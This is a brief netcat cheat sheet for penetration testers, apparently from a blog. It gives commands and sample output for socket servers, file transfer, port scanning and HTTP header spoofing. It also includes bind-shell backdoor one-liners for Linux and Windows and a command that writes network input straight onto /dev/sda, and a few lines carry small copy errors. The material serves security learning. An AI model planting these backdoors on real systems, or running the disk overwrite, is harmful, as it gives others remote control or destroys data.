The Concise NetCat CheatSheet for Pentesters
This cheatsheet was put together in response to an increasing prevalence of ‘cheatsheets’ so vast in size that they might as well be labelled “extended help”. This article will be updated with cool stuff over time.
Netcat Telnet
$ nc -v google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1
HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219X-XSS-Protection: 1; mode=block
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
Netcat Simple Socket Servers
$ nc -l -v 1234
$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
abc
ting tongserver
After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.
$ nc -l -v 5555
Connection from 127.0.0.1 port 5555 [tcp/rplay] accepted
abc
ting tong
Complete ECHO Server
$ ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done
$ nc -l -v 1234 > data.txt
UDP Server
$ nc -v -ul 7000
Connect to this server using netcat from another terminal
$ nc localhost -u 7000
$ netstat | grep 7000
udp 0 0 localhost:42634 localhost:7000 ESTABLISHED
Netcat File transfer
One machine A – Send File
$ cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:5555
On machine B – Receive File
$ ncat localhost 5555 > happy_copy.txt
Netcat Port Scanning
$ nc -v -n -z -w 1 192.168.1.2 75-85
nc: connect to 192.168.1.2 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 79 (tcp) failed: Connection refused
Connection to 192.168.1.2 80 port [tcp/*] succeeded!
nc: connect to 192.168.1.2 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 85 (tcp) failed: Connection refused
Netcat Linux Remote Shell/Backdoor
$ ncat -v -l -p 7777 -e /bin/bash
Connect to this bash shell using nc from another terminal
$ nc localhost 7777
Netcat Windows Remote Shell/Backdoor
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 1182
Netcat Cloning Hard Drives & Partition
$ nc -l -p 1234 | dd of=/dev/sda
Netcat as a Webserver
$ while true; do nc -l -p 80 -q 1 < somepage.html; done
NETCAT Spoofing HTTP Headers
You can use netcat to request web pages:
nc ispconfig.org 80
You can then type in headers as follows:
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
server2:~# nc exampple.com 80
GET / HTTP/1.1
Host: example.com
Referrer: mypage.com
User-Agent: my-browser
HTTP/1.1 200 OK
Date: Fri, 28 Nov 2008 14:11:49 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Wed, 26 Nov 2008 19:34:17 GMT
ETag: "228c707-21b1-b6b7e040"
Accept-Ranges: bytes
Content-Length: 8625
Content-Type: text/html
[...]
Netcat Timeouts
Server :
nc -l 2389
Client :
$ nc -w 10 localhost 2389
Netcat IPV6 Connectivity
Server :
$ nc -4 -l 2389
Client :
$ nc -4 localhost 2389
Now, if we run the netstat command, we see :
$ netstat | grep 2389
tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED
tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
Now, If we force nc to use IPV6 addresses –
Server :
$ nc -6 -l 2389
Client :
$ nc -6 localhost 2389
Now, if we run the netstat command, we see :
$ netstat | grep 2389
tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED
tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
Force Netcat Server to Stay Up
This behaviour can be controlled by using the -k flag at the server side to force the server to stay up even after the client has disconnected.
$ nc -k -l 2389
Configure Netcat Client to Stay Up after EOF
$ nc -q 5 localhost 2389
Comments
Loading…